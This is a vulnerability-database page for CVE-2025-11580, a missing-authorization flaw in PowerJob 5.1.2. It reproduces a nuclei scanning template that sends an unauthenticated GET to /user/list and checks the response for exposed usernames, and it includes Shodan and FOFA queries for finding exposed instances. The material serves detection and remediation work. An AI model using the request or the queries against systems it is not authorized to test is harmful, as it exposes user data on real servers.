Lucene search
K

PowerJob List - Authorization Bypass

🗓️ 04 Feb 2026 07:00:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 5 Views

PowerJob 5.1.2 has broken access control in /user/list enabling remote unauthorized access with no privileges.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2025-11580
10 Oct 202518:02
attackerkb
Circl
CVE-2025-11580
21 Jan 202606:39
circl
CNNVD
PowerJob 安全漏洞
10 Oct 202500:00
cnnvd
CVE
CVE-2025-11580
10 Oct 202518:02
cve
Cvelist
CVE-2025-11580 PowerJob list authorization
10 Oct 202518:02
cvelist
EUVD
EUVD-2025-33758
10 Oct 202518:02
euvd
Github Security Blog
PowerJob has Missing Authorization in its /user/list file
10 Oct 202518:31
github
NVD
CVE-2025-11580
10 Oct 202518:15
nvd
OSV
GHSA-87XJ-GHMC-C3XQ PowerJob has Missing Authorization in its /user/list file
10 Oct 202518:31
osv
Positive Technologies
PT-2025-41581
10 Oct 202500:00
ptsecurity
Rows per page
id: CVE-2025-11580

info:
  name: PowerJob List - Authorization Bypass
  author: DhiyaneshDk
  severity: medium
  description: |
    PowerJob = 5.1.2 contains a broken access control caused by missing authorization in /user/list function, letting remote attackers access unauthorized resources, exploit requires no special privileges.
  impact: |
    Remote attackers can access unauthorized resources, potentially leading to data exposure or privilege escalation.
  remediation: |
    Update to the latest version beyond 5.1.2.
  reference:
    - https://github.com/PowerJob/PowerJob/issues/1127
    - https://nvd.nist.gov/vuln/detail/CVE-2025-11580
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"PowerJob"
    fofa-query: title="PowerJob"
    product: powerjob
    vendor: powerjob
  tags: cve,cve2025,powerjob,auth-bypass,oss

http:
  - raw:
      - |
        GET /user/list HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"success":true'
          - '"username":'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100807b0525e4c82205cd11156995046a97af5244ab3dc7b5aae46bc9742916e4bc02210094b9829d328208daa8e26878b6685f80e10f8c0a974b30b010cffcc0d6389d5c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.5Medium risk
Vulners AI Score5.5
CVSS 25
CVSS 3.15.3
CVSS 46.9
CVSS 35.3
EPSS0.01013
SSVC
5